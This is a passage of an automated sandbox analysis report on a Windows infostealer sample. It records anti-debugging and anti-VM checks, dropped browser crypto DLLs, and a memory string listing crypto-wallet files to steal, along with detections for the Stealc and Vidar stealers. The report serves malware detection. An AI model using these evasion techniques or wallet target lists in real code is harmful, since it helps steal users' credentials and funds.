Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127856D second address: 1278577 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD0E506DD0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278772 second address: 1278778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278778 second address: 127877C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127877C second address: 12787DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor dword ptr [ebp+122D3323h], esi 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FD0E4E9B9E8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edx, 470F10D2h 0x00000030 push C1493EEFh 0x00000035 pushad 0x00000036 pushad 0x00000037 jmp 00007FD0E4E9B9ECh 0x0000003c jmp 00007FD0E4E9B9EFh 0x00000041 popad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12789DE second address: 12789E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12789E9 second address: 1278A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+12449DCDh] 0x0000000d push dword ptr [ebp+122D1D74h] 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FD0E4E9B9E8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d call 00007FD0E4E9B9E9h 0x00000032 push esi 0x00000033 push esi 0x00000034 jbe 00007FD0E4E9B9E6h 0x0000003a pop esi 0x0000003b pop esi 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jno 00007FD0E4E9B9E6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278A3E second address: 1278A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278A47 second address: 1278A57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278A57 second address: 1278A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278A5B second address: 1278A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278A65 second address: 1278A8E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0E506DD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jng 00007FD0E506DD0Ch 0x00000014 js 00007FD0E506DD06h 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127B509 second address: 127B50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127B50D second address: 127B52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0E506DD0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD0E506DD0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583026D second address: 583027D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 583027D second address: 5830290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E506DD0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830290 second address: 58302E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0E4E9B9EFh 0x00000008 pushfd 0x00000009 jmp 00007FD0E4E9B9F8h 0x0000000e sbb si, 4938h 0x00000013 jmp 00007FD0E4E9B9EBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD0E4E9B9F5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1196939 second address: 119693D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119693D second address: 1196941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830A9D second address: 5830AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830AA1 second address: 5830AB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830AB6 second address: 5830ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830ABC second address: 5830AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830AC0 second address: 5830AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830AD0 second address: 5830AE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0E4E9B9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830AE0 second address: 5830AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0E506DD0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5830AF2 second address: 5830B04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, si 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FF18A9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FF199E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1188F44 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1220BC9 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00DA4910
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 6_2_00D9DA80
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 6_2_00D9E430
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00D916D0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00D9F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 6_2_00DA3EA0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 6_2_00D9BE70
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 6_2_00DA38B0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 6_2_00DA4570
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 6_2_00D9ED20
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 6_2_00D9DE10
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D91160 GetSystemInfo,ExitProcess, 6_2_00D91160
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000006.00000002.1538127264.000000000116C000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: DAEGIDHD.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: tasks.office.comVMware20,11696503903o
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: DAEGIDHD.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: DAEGIDHD.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: DAEGIDHD.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: DAEGIDHD.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: DAEGIDHD.6.dr Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: file.exe, 00000006.00000002.1538633015.0000000001972000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1538633015.00000000019A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: DAEGIDHD.6.dr Binary or memory string: global block list test formVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
Source: DAEGIDHD.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: DAEGIDHD.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: AMC password management pageVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: DAEGIDHD.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: DAEGIDHD.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: DAEGIDHD.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: DAEGIDHD.6.dr Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: DAEGIDHD.6.dr Binary or memory string: outlook.office.comVMware20,11696503903s
Source: DAEGIDHD.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: file.exe, 00000006.00000002.1538633015.000000000192E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: DAEGIDHD.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: file.exe, 00000006.00000002.1538127264.000000000116C000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: DAEGIDHD.6.dr Binary or memory string: dev.azure.comVMware20,11696503903j
Source: DAEGIDHD.6.dr Binary or memory string: discord.comVMware20,11696503903f
Source: DAEGIDHD.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 6_2_6C5C5FF0
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00D945C0 VirtualProtect ?,00000004,00000100,00000000 6_2_00D945C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00DA9860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA9750 mov eax, dword ptr fs:[00000030h] 6_2_00DA9750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 6_2_00DA78E0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C59B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6C59B66C
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C59B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C59B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 6_2_00DA9600
Source: file.exe, 00000006.00000002.1538127264.000000000116C000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: =Program Manager
Source: file.exe Binary or memory string: bj=Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C59B341 cpuid 6_2_6C59B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 6_2_00DA7B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 6_2_00DA7980
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 6_2_00DA7850
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 6_2_00DA7A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 6.2.file.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.1311274897.00000000056A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1537629234.0000000000D91000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1538633015.000000000192E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
